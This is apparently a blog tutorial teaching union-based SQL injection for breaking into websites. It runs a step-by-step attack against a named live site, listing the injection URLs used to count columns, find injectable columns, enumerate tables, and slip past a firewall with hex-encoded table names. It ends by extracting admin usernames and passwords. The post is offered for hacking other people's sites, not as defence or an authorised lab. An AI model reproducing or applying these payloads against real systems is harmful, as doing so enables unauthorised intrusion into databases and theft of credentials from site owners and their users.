Header Ads

Seo Services
Home Unlabelled How to hack Websites with SQL-Injection (Simple Union Base Injection)

How to hack Websites with SQL-Injection (Simple Union Base Injection)

08:08
Asslam-u-Alaikum Friends!MTW HaXer is Here.Today in this tutorial i am going to teach/show you How to hack websites by SQL-Injection.This is simple Union Based SQL-Injection.InshAllah soon i will post more tutorials on SQL-Injection.So let's start our Simple Union Based SQL-Injection.

 Step 1. Find The Injection Point On Any Php Site

(Ex. index.php?id=1, trainers.php?id=2, lageid=2, games.php?id=, porn.phpid=  etc)
Like This Site :- www.site.com/index.php?id=1

Step2. After Find It First Check This Site Vulnerable Or Not……

i Have A site http://bbss.com.pk/index.php?id=483

we will add single quoto(‘) after:- ?id=483

Like This http://bbss.com.pk/index.php?id=483’

Hit Enter

Step3. After adding the Single Quoto(‘) If Site Showing Some Sqli Error Or Hide Data On This This Mins Its Vulnerable.

Step4. Start The  Operation On Url, Now We Will Count total Number Of Columns In Information_schema.

We Will Use Order By Query For The Count The Columns.
Like This:-  http://bbss.com.pk/index.php?id=483 order by 100--

i am putting -- for comment out the query
It is Showing error so.
now total number of columns is between 1 to 100 .
now i will decrease my columns no.

Step4.2 Now I Select Just 20th number of columns for shorting the site data.
Like this:-     http://bbss.com.pk/index.php?id=483 order by 20--

still error

Here Is Total no. Of Columns Is 11 Because at 12 there is Error

Step5. Now I Am Going To use Union Command For Checking Vulnerable Columns

Like This:-  http://bbss.com.pk/index.php?id=-483 union select all 1,2,3,4,5,6,7,8,9,10,11--

Here Union Is Combining Both Of The Queries 1st one is site’s Query and 2nd is my select query..

Here It Is Not Printing Vulnerable Columns Because There Is Not Sufficient Free Space To Print
Vulnerable Columns…. so i will hide site data by using -- sign.

Now  Here  Vulnerable Columns is 3 and 6.

Now We Will Fetch All The Data Using Column Number 3 And 6.


Here Is Some Cmd For Fetch Data On Website:-
Variable/Function        Output
@@hostname    :            Current Hostname
@@tmpdir    :            Tept Directory
@@datadir    :            Data Directory
@@version    :            Version of DB
@@basedir    :            Base Directory
user()        :            Current User
database()    :            Current Database
version()    :            Version
schema()    :            current Database
UUID()        :            System UUID key
current_user()    :        Current User
current_user    :        Current User
system_user()    :        Current Sustem user
session_user()    :        Session user
@@GLOBAL.have_symlink : Check if Symlink Enabled or Disabled
@@GLOBAL.have_ssl    :    Check if it have ssl or not

Step6.  Now Finding The DataBase Name Or Version Name Using Vulnerable Columns.
Like This:-        http://bbss.com.pk/index.php?id=-483 union select all 1,2,Database(),4,5,Version(),7,8,9,10,11--

You See On Website Page:- Database Is= ‘bbss_com_pk_db’  ,    Version= ‘5.1.73-community

Step7. Now We Will Fetch tablenames

Like This:-http://bbss.com.pk/index.php?id=-483 union select all 1,2,table_name,4,5,6,7,8,9,10,11 from information_schema.tables--

information_schema is the collection of database…..here we are fetching all tablesnames from all database…

Here there is Onley one table But I want all the tables of information_schema…so i use group_concat() For the grouping of tables…

Step8. But i Want tablenames only from database….so now we will set where condition…

Like This:-  http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(table_name),4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()–

Now These are all table of the database…

Step9. Now I Am unable to see all the tables so i will use <br> tag for the parallel printing of tablenames.
LikeThis:- http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(table_name,<br>),4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()–
Hit Enter We Shown A Error,  We Need To Encrypt The <br> Tag In 0xHEX Code <br>=(0x3c62723e)
Like This:- http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(table_name,0x3c62723e),4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--

Step10. Now I Fetch Table name ‘Admin_login

Like This:-http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(column_name,0x3c62723e),4,5,6,7,8,9,10,11 from information_schema.columns where table_name=admin_login--

oops Here Is Firwall That Block the table_name=admin_login fetching.
now i will Encrypt The admin_login in mysql_char().

LikeThis= http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(column_name,0x3c62723e),4,5,6,7,8,9,10,11 from information_schema.columns where table_name=0x61646d696e5f6c6f67696e--

We Got It The admin_login Columns.

Step11. Now i fetch Juicy Data  That Is   name and password

like This:-http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(name,0x3a,password),4,5,6,7,8,9,10,11 from admin_login--

In This Step i Use 0x3a  for Divide The name and password (:)  And Remember Dont Forget It Decrypt The admin_login on normal txt in Final Step.

 If you have any problem or you want any help.Contact with me on facebook.
Facebook:https://www.facebook.com/mobeen1337
Tags :

No comments:

Subscribe to: Post Comments ( Atom )
Powered by Blogger.